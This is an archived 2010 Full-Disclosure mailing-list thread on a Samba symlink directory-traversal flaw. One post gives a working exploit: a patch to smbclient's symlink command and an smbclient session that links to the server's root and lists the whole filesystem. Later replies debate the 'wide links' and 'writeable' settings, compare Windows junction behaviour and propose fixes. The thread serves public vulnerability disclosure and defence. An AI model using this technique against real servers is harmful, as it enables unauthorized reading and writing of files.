Mailing List Archive: Full Disclosure: Full-Disclosure

Samba Remote Zero-Day Exploit

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

kcope2 at googlemail

Feb 4, 2010, 9:12 PM

Post #1 of 25 (2690 views)
Permalink

Samba Remote Zero-Day Exploit

Hello list,

this is Kingcope.

You can view a demonstration of the zeroday entitled
'Samba Remote Zero-Day Exploit' with full details
on youtube. The bug is a logic fuckup.

http://www.youtube.com/watch?v=NN50RtZ2N74

I added some nice greek tune so turn your speakers on (or off).

Greetings to Alex and andi.

Cheerio and Signed,

//Kingcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

kcope2 at googlemail

Feb 5, 2010, 8:04 AM

Post #2 of 25 (2638 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root [at] nr-pentes:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\>

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root [at] nr-pentes:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
d_printf("symlink <oldname> <newname>\n");
return 1;
}
oldname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf2);
if (!newname) {
return 1;
}
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/

if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
d_printf("link %s: %s\n", oldname, cli_errstr(cli));
return 1;

}

if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
d_printf("Server doesn't support UNIX CIFS calls.\n");
return 1;
}

if (!cli_unix_symlink(targetcli, targetname, newname)) {
d_printf("%s symlinking files (%s -> %s)\n",
cli_errstr(targetcli), newname, targetname);
return 1;
}

return 0;
}

// Cheers,
// kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

paul.szabo at sydney

Feb 5, 2010, 2:03 PM

Post #3 of 25 (2625 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Kingcope,

The samba server follows symlinks by default. There are options
("follow symlinks", "wide links") for turning it off:

http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS

The "problem" at your installation seems a mis-configuration of
your server: please ask the admin to set "secure" options.
(Some samba installations, like mine, wish to allow same access as a
UNIX login would allow. Some shares like [home] are provided for ease
of use, users are encouraged to create symlinks to other "interesting"
places e.g. NFS-mounted directories.)

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

dan at doxpara

Feb 5, 2010, 2:26 PM

Post #4 of 25 (2624 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

The bug here is that out-of-path symlinks are remotely writable. If a
pre-existing symlink is there, it's not a problem. But Kingcope's bug is
legit, the fact that he can *generate* the symlink breaks the entire path
concept of SMB shares. As long as "cd .." wasn't working, "symlink .."
mustn't either.

I agree that a user with local access should be able to generate out of path
symlinks -- there's no path constraint concept in local access (well, not
without a restricted shell, but thats its own ball of wax). But Samba
supports dropping a user into a path, and it really does need to keep him
there.

(On a side note, you're not going to see this sort of symlink stuff on
Windows, and Samba is supposed to match Windows semantics in general. Also,
this sort of directory traversal pops up from year to year, in web platforms
particularly, but also things like tar.)

On Fri, Feb 5, 2010 at 5:03 PM, <paul.szabo [at] sydney> wrote:

> Dear Kingcope,
>
> The samba server follows symlinks by default. There are options
> ("follow symlinks", "wide links") for turning it off:
>
> http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
>
> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS
>
> The "problem" at your installation seems a mis-configuration of
> your server: please ask the admin to set "secure" options.
> (Some samba installations, like mine, wish to allow same access as a
> UNIX login would allow. Some shares like [home] are provided for ease
> of use, users are encouraged to create symlinks to other "interesting"
> places e.g. NFS-mounted directories.)
>
> Cheers, Paul
>
> Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics University of Sydney Australia
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

paul.szabo at sydney

Feb 5, 2010, 2:43 PM

Post #5 of 25 (2621 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Dan,

> The bug here is that out-of-path symlinks are remotely writable. ...

You mean "creatable".

> ... the fact that he can *generate* the symlink breaks ...

Nothing breaks if the admin sets "wide links = no" for that share: the
link is not followed.

> But Samba supports dropping a user into a path ...

I never noticed such support documented: references please?

> ... and it really does need to keep him there.

You cannot "break out" of shares with "wide links = no".

> ... Samba is supposed to match Windows semantics in general.

No please, do not dumb it down.

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

kcope2 at googlemail

Feb 5, 2010, 3:38 PM

Post #6 of 25 (2625 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Hello Paul,

First and foremost I did not know about the configuration setting which
closes the bug when i posted the advisory. So this was my mistake.
But for the most servers which are not entirely hardened (and my
assumption is that this applies to many servers in internal networks)
the traversal can be a serious issue, because a samba user (even nobody)
can create the symlinks. It would in my point of view be more secure to
only allow administrators to create symlinks as it is intended.
Again I might be wrong with this thought.
I first audited Windows Server 2008 for the new SMB2 hardlinking
features. Symlinking on a windows server is possible but only when the
remotely logged in account is the Administrator. Creating symlinks to
paths outside the directory of the given share is not possible. However
accessing a symlink in a directory which points to for example c:\
is possible. I don't say that because Samba should have the same
semnatics as Windows, but because it's implemetation of handling remote
to local and local to remote symbolic links is more secure.
After failing in auditing the Windows servers on the potential
vulnerabilites I just gave samba a try and the default configuration
of my Ubuntu Desktop System and CentOS Server allowed me to conduct the
attack out of the box. Turning off symlink support in samba closes the
hole but then no access to symlinks created by the administrator is
possible or am I wrong?

With Respect,

Kingcope

Am Samstag, den 06.02.2010, 09:43 +1100 schrieb
paul.szabo [at] sydney:
> Dear Dan,
>
> > The bug here is that out-of-path symlinks are remotely writable. ...
>
> You mean "creatable".
>
> > ... the fact that he can *generate* the symlink breaks ...
>
> Nothing breaks if the admin sets "wide links = no" for that share: the
> link is not followed.
>
> > But Samba supports dropping a user into a path ...
>
> I never noticed such support documented: references please?
>
> > ... and it really does need to keep him there.
>
> You cannot "break out" of shares with "wide links = no".
>
> > ... Samba is supposed to match Windows semantics in general.
>
> No please, do not dumb it down.
>
> Cheers, Paul
>
> Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

paul.szabo at sydney

Feb 5, 2010, 4:04 PM

Post #7 of 25 (2626 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Kingcope,

> Turning off symlink support in samba closes the hole but then no
> access to symlinks created by the administrator is possible ...

Correct.

Maybe what you want is for Samba to add and support an option like
"allow create symlink" (with default "no"). I myself do not think it
would be useful... would surely be a few lines of code only, so if you
want to submit a patch to the Samba team... or just patch your own
servers (as I do, see http://www.maths.usyd.edu.au/u/psz/samba/).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Thierry at Zoller

Feb 6, 2010, 3:43 AM

Post #8 of 25 (2596 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Hi Paul,

Facts :
- Several distributions run with vulnerable settings per default
if there is a "misconfiguration" it is part of the vendor.
- Your not supposed to be able to traverse dirs.

Consequence it is a vulnerability, whether you can mitigate it is
a different piece of cake.

Next time somebody creates an IE8 0day that relies on javascript,
will you scream "misconfiguration!" ? Of course you could disable
javascript but is it by enabled default ? Yes.

The question for smb is who does restrict this setting?
My tests reveal - not many.

Congrats Kingcope, nice bug. Directory traversal in major daemon in
2010.

Regards,
Thierry

pssea> Dear Kingcope,

pssea> The samba server follows symlinks by default. There are options
pssea> ("follow symlinks", "wide links") for turning it off:

pssea> http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
pssea> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
pssea> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS

pssea> The "problem" at your installation seems a mis-configuration of
pssea> your server: please ask the admin to set "secure" options.
pssea> (Some samba installations, like mine, wish to allow same access as a
pssea> UNIX login would allow. Some shares like [home] are provided for ease
pssea> of use, users are encouraged to create symlinks to other "interesting"
pssea> places e.g. NFS-mounted directories.)

pssea> Cheers, Paul

pssea> Paul Szabo psz [at] maths
pssea> http://www.maths.usyd.edu.au/u/psz/
pssea> School of Mathematics and Statistics University of Sydney Australia

pssea> _______________________________________________
pssea> Full-Disclosure - We believe in it.
pssea> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
pssea> Hosted and sponsored by Secunia - http://secunia.com/

--
http://blog.zoller.lu
Thierry Zoller

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Thierry at Zoller

Feb 6, 2010, 3:50 AM

Post #9 of 25 (2591 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

http://blog.metasploit.com/2010/02/exploiting-samba-symlink-traversal.html

--
http://blog.zoller.lu
Thierry Zoller

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

paul.szabo at sydney

Feb 6, 2010, 4:59 AM

Post #10 of 25 (2595 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Thierry,

> Of course you could disable ... but is it by enabled default?

Hmm... looking at
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WRITEABLE
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#READONLY
it seems that writeable is off by default: a Samba installation, as per
default, is not vulnerable.

> - Several distributions run with vulnerable settings per default
> if there is a "misconfiguration" it is part of the vendor.

Is that vendor Samba?

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stefan.kanthak at nexgo

Feb 6, 2010, 5:21 AM

Post #11 of 25 (2593 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dan Kaminsky wrote:

[...]

> (On a side note, you're not going to see this sort of symlink stuff on
> Windows,

What exactly do you mean?
Traversing symlinks on the server/share, or creation of "wide" symlinks
by the client on the server/share?

Since Windows 2000 NTFS supports "junctions", which pretty much resemble
Unix symlinks, but only for directories.
See <http://support.microsoft.com/kb/205524/en-us>

On the server, create a junction in your share and let it point to an
arbitrary local directory outside the share, and clients connected to
that share can enter the junction and access the "linked" directory.

If you have write access to the share from the client you can create
a "wide" junction there too, just as the OP showed with smbclient/samba.

> and Samba is supposed to match Windows semantics in general.

Except a mapping of directory symlinks to junctions for example.-(

Stefan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

dan at doxpara

Feb 6, 2010, 9:43 AM

Post #12 of 25 (2582 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

You need admin rights to create junctions. At that point, path
constraints aren't relevant, just psexec and get not only arbitrary
path but arbitrary code.

The fix is to do what everybody with a directory traversal bug has to
do, block out of path relative directories. In this specific case,
prevent the creation of symlinks where the target is out of the SMB
share's range. (Still allow navigation to such symlinks if one exists,
though.)

On Feb 6, 2010, at 8:21 AM, "Stefan Kanthak" <stefan.kanthak [at] nexgo>
wrote:

> Dan Kaminsky wrote:
>
> [...]
>
>> (On a side note, you're not going to see this sort of symlink stuff
>> on
>> Windows,
>
> What exactly do you mean?
> Traversing symlinks on the server/share, or creation of "wide"
> symlinks
> by the client on the server/share?
>
> Since Windows 2000 NTFS supports "junctions", which pretty much
> resemble
> Unix symlinks, but only for directories.
> See <http://support.microsoft.com/kb/205524/en-us>
>
> On the server, create a junction in your share and let it point to an
> arbitrary local directory outside the share, and clients connected to
> that share can enter the junction and access the "linked" directory.
>
> If you have write access to the share from the client you can create
> a "wide" junction there too, just as the OP showed with smbclient/
> samba.
>
>> and Samba is supposed to match Windows semantics in general.
>
> Except a mapping of directory symlinks to junctions for example.-(
>
> Stefan
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

marxclou at hushmail

Feb 6, 2010, 11:46 AM

Post #13 of 25 (2574 views)
Permalink

Samba Remote Zero-Day Exploit [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear Paul,

seems like u get personal pissed about the situation or you are not
able to see that this is obviously a problem. But maybe you can
enlighten everybody how it is possible per "default" not to
traversal a directory by cd but doing this via symlink? To put the
circle
the other way around, do you have an option per "default" enabled
which forbids to traverse a directory? No?

Regards,
Marx
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkttxxAACgkQ3FclBRq92Beu/wP+K5HNWKjk6aQZN2nyWKWpwBf5rmnn
GA279uvdCSfcW9/M+7L7nEr97pdeKG8DyVLbbX6jYlIcwpn+I77Cw2yVzoS6ZBeKrxBw
6IJ1CrmTfftJvnZRVWQ0KYXNgjHpyWQhXnFDPEq17x8/PUtd4Bi0DAaisxnO0YGMoxZy
wWPwE7I=
=spzD
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

marxclou at hushmail

Feb 6, 2010, 12:43 PM

Post #14 of 25 (2572 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>The default setting is "writeable = no". If you change that, then
>you are responsible for reading the docs and setting secure
>options.

This is an interesting point of view. However u haven't answered my
question. Is there an option to enable a traversal or lets say
chdir to a path outside of the configured enviroment which is
disabled by default?

Regards,
marx

On Sat, 06 Feb 2010 21:29:14 +0100 paul.szabo [at] sydney wrote:
>Dear Marx,
>
>> seems like u get personal pissed ...
>
>No I do not take it personally.
>
>> ... how it is possible per "default" ...
>
>The default setting is "writeable = no". If you change that, then
>you are responsible for reading the docs and setting secure
>options.
>
>Cheers, Paul
>
>Paul Szabo psz [at] maths
>http://www.maths.usyd.edu.au/u/psz/
>School of Mathematics and Statistics University of Sydney
>Australia
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAktt1HgACgkQ3FclBRq92Bd4bgQAgLruU2uXcdEYvskonAm9mxpQVgiD
CNTiyEwNAyBI8FU0cPaPPNQK01EI5g8K067dgh02dO+9Tz7bRapOXkjq3MRqIgOqdrk7
ylD0j7WJFHEOhYXiPBFE1Lr5lUqL1FCTETt0VyJnQ3XTIx2x5oZ/Wx6a6GSkhUtfn5f2
oPlFMBw=
=sDvn
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

paul.szabo at sydney

Feb 6, 2010, 12:59 PM

Post #15 of 25 (2574 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Marx,

> This is an interesting point of view.

I had replied to you personally only, you should not have posted my
reply to any mailing lists. But since you posted... yes my views are
interesting, should be studied and followed, for enlightenment :-)

> However u haven't answered my question. Is there an option to enable
> a traversal or lets say chdir to a path outside of the configured
> enviroment which is disabled by default?

No I do not think there is an option to allow chdir to outside.
(Please scritunize docs and sources, I may have missed something.)

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

paul.szabo at sydney

Feb 6, 2010, 1:48 PM

Post #16 of 25 (2573 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

I find it puzzling how this discussion, including the official Samba
response

http://www.samba.org/samba/news/symlink_attack.html

fails to consider whether the mentioned configuration (when admin sets
non-default "writeable = yes" but leaving default "wide links = yes")
allows write access to the whole filesystem (where the user has UNIX
rights). I also wonder about the interaction with the setting of "unix
extensions" (which I had set to non-default "no" to help Mac clients).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

marxclou at hushmail

Feb 6, 2010, 2:06 PM

Post #17 of 25 (2571 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I had replied to you personally only, you should not have posted
>my
>reply to any mailing lists. But since you posted...

I'm very sorry about this. This may sound odd, but it wasn't my
idea of putting a private mail public. This was not an act of
disrespect.

Best regards,
marx
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAktt59gACgkQ3FclBRq92BeZTgP/QNL5/u5jR1uYEOW9XJmXHJr0ULnG
V702WoaoekgOPTXMjr5c1NfT/LmGFepG9J1BNTzt1IAFIJmhx67vuceI1KX1Bi3NgBEf
nZNVnPycDmvT4a76mFZGsLCoaWZxwDUQdYAXGkqGGgIqKRmURUPxkkmcyhqVw3vnJFQZ
IGXGHBA=
=JbVX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stefan.kanthak at nexgo

Feb 6, 2010, 2:26 PM

Post #18 of 25 (2425 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Dan Kaminsky wrote on February 06, 2010 6:43 PM:

> You need admin rights to create junctions.

OUCH!
No, creating junctions (as well as the Vista introduced symlinks)
DOESN'T need admin rights!

[snip]

Stefan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

dan at doxpara

Feb 6, 2010, 2:30 PM

Post #19 of 25 (2562 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

On Feb 6, 2010, at 5:26 PM, "Stefan Kanthak" <stefan.kanthak [at] nexgo>
wrote:

> Dan Kaminsky wrote on February 06, 2010 6:43 PM:
>
>> You need admin rights to create junctions.
>
> OUCH!
> No, creating junctions (as well as the Vista introduced symlinks)
> DOESN'T need admin rights!
>
> [snip]
>

Really? Try. Especially remotely over SMB w/o remote interactive.

> Stefan
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Michael.Wojcik at microfocus

Feb 8, 2010, 12:38 PM

Post #20 of 25 (2331 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> Sent: Saturday, 06 February, 2010 08:21
>
> Dan Kaminsky wrote:
>
> [...]
>
> > (On a side note, you're not going to see this sort of symlink stuff
> > on Windows,
>
> What exactly do you mean?
> Traversing symlinks on the server/share, or creation of "wide"
symlinks
> by the client on the server/share?
>
> Since Windows 2000 NTFS supports "junctions", which pretty much
> resemble Unix symlinks, but only for directories.
> See <http://support.microsoft.com/kb/205524/en-us>

And at least since Vista, it also supports symlinks, which are designed
to mimic Unix symlinks, and can point to files or directories. Junctions
and symlinks can cross volumes; symlinks can also refer to files or
directories on network filesystems.

Junctions (which Microsoft also sometimes refers to as "soft links") and
symlinks are implemented with NTFS reparse points, just like mounts. You
can see some of the differences between them using "fsutil reparsepoint
query <path>", where "<path>" is a junction or symlink.

In Vista and later, symlinks and junctions can be created with the
mklink command. (I've seen some comments about symlinks being available
in earlier versions of NTFS, via Services for Unix; but at least in SFU
2.0, symlinks were just files with a special format, not reparse
points.)

The Windows SMB server apparently won't cross reparse points, though, so
there's no equivalent vulnerability.

--
Michael Wojcik
Principal Software Systems Developer, Micro Focus

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stefan.kanthak at nexgo

Feb 8, 2010, 1:33 PM

Post #21 of 25 (2322 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Michael Wojcik wrote:

>> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> Sent: Saturday, 06 February, 2010 08:21
>>
>> Dan Kaminsky wrote:
>>
>> [...]
>>
>> > (On a side note, you're not going to see this sort of symlink stuff
>> > on Windows,
>>
>> What exactly do you mean?
>> Traversing symlinks on the server/share, or creation of "wide"
>symlinks
>> by the client on the server/share?
>>
>> Since Windows 2000 NTFS supports "junctions", which pretty much
>> resemble Unix symlinks, but only for directories.
>> See <http://support.microsoft.com/kb/205524/en-us>
>
> And at least since Vista, it also supports symlinks, which are designed

s/at least//

[ well-known facts snipped ]

> The Windows SMB server apparently won't cross reparse points, though, so
> there's no equivalent vulnerability.

NO, Windows SMB server crosses reparse points!

But as Dan Kaminsky pointed out, you need to have administrative rights
to remotely create a junction on an SMB share, so the non-admin user
cant get himself access to files outside a share he's allowed to access.

Stefan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

khc at pm

Feb 8, 2010, 1:57 PM

Post #22 of 25 (2329 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

Thierry Zoller <Thierry [at] zoller> writes:

> Facts :
> - Several distributions run with vulnerable settings per default
> if there is a "misconfiguration" it is part of the vendor.
> - Your not supposed to be able to traverse dirs.

What's wrong with creating $HOME/tmp -> /tmp/$USER (not necessarily
with Samba, maybe with xterm or ssh) and then accessing /tmp/$USER via
/host/HOME/tmp? Why is it a problem while "ssh host cat /etc/passwd" is
not?

Can you traverse a directory for which you have no +x right?
Can you, for example, write to a file for which you have no +w right?
Read without +r?

If you can't, maybe it's a (local config?) issue with guest accounts, or
maybe Windows-only (and similar, non-guest) accounts, instead of
permissions and symlinks?

Disabling or limiting symlink creation will not really close the "hole",
the problem is not the symlink but that the user has fs access which he
(or she) should never have.

... unless (obviously) answer to any of the 3 questions is positive
(I haven't checked, to be honest) - is it?
--
Chris

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Michael.Wojcik at microfocus

Feb 9, 2010, 6:20 AM

Post #23 of 25 (2326 views)
Permalink

Re: Samba Remote Zero-Day Exploit [In reply to]

> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> Sent: Monday, 08 February, 2010 16:33
>
> Michael Wojcik wrote:
>
> >> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> >> Sent: Saturday, 06 February, 2010 08:21
> >>
> >> Since Windows 2000 NTFS supports "junctions", which pretty much
> >> resemble Unix symlinks, but only for directories.
> >> See <http://support.microsoft.com/kb/205524/en-us>
> >
> > And at least since Vista, it also supports symlinks, which are
> > designed
>
> s/at least//
> [ well-known facts snipped ]

So ... your original note about junctions did not cover "well-known
facts", but my note about other reparse point types did?

> > The Windows SMB server apparently won't cross reparse points,
though,
> > so there's no equivalent vulnerability.
>
> NO, Windows SMB server crosses reparse points!

Not in my testing, at least not for junctions and symlinks. User with
requisite authority could traverse the junctions and symlinks locally,
but not remotely via a share.

> But as Dan Kaminsky pointed out, you need to have administrative
rights
> to remotely create a junction on an SMB share, so the non-admin user
> cant get himself access to files outside a share he's allowed to
> access.

Unless the reparse point already exists.

This particular exploit happened to involve a remote user creating a
